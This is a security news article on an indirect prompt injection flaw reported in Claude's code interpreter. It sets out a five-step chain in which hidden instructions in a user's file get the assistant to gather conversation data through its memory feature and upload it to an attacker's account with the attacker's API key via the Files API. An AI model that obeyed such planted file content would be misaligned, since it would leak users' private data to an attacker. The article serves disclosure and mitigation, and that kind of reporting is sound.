[AI and Security] Claude AI, 'Indirect Prompt Injection' Vulnerability Discovered... Risk of Sensitive Information Theft
News

[AI and Security] Claude AI, 'Indirect Prompt Injection' Vulnerability Discovered... Risk of Sensitive Information Theft

2025.11.16
ยทWebยทby Anonymous
#AI#Security#Vulnerability#Prompt Injection#Anthropic

Key Points

  • 1A critical vulnerability has been discovered in Anthropic's Claude AI, allowing sensitive user data to be exfiltrated through indirect prompt injection attacks.
  • 2This exploit leverages Claude's code interpreter's network access and its 'memory' function to force the AI to extract and upload user data to an attacker's account, bypassing authentication.
  • 3Security experts advise strengthening sandbox rules to limit API calls, restricting network access, and considering this a "triple threat" combining powerful AI models, external access, and prompt-based control.

A vulnerability termed "Indirect Prompt Injection" has been discovered in Anthropic's Claude AI, enabling the exfiltration of sensitive user data to an attacker's account. The root cause lies in the newly added network access feature of Claude's Code Interpreter tool. Specifically, the default setting "Package manager only" permits network access to approved domains, including api.anthropic.com, which security researcher Johan Reiberger identified as a security loophole.

The core methodology of this attack involves a multi-stage process leveraging Claude's internal functionalities:

  1. Indirect Prompt Injection: An attacker initiates the attack by embedding malicious instructions within seemingly innocuous content, such as a file provided by a user for analysis. This hidden instruction serves as an indirect prompt.
  2. Memory Exploitation: Upon processing the malicious content, the injected indirect prompt exploits Claude's 'memory' feature. This instructs the AI to extract recent conversational data or other sensitive information from its context and store it as a file within Claude's isolated sandbox environment.
  3. Forced Code Execution: The malicious prompt then compels Claude to execute a specific Python script within its Code Interpreter.
  4. API Key Configuration: The executed Python script is designed to set the attacker's own API key as an environment variable within Claude's execution context.
  5. Data Exfiltration via Files API: Finally, the Python script utilizes Claude's internal Files API to upload the previously stolen files from the sandbox environment directly to the attacker's API-associated account. This entire sequence bypasses the legitimate user's authentication procedures.

Johan Reiberger responsibly disclosed this vulnerability to Anthropic, which initially dismissed it as being out of scope for "model safety issues" but later acknowledged its validity. Security experts categorize this as a "critical triple threat" due to the confluence of powerful AI models, external network access capabilities, and prompt-based control mechanisms. Recommended mitigation strategies include strengthening sandbox rules to restrict API calls exclusively to the logged-in user's account and advising users to minimize or disable network access for the AI.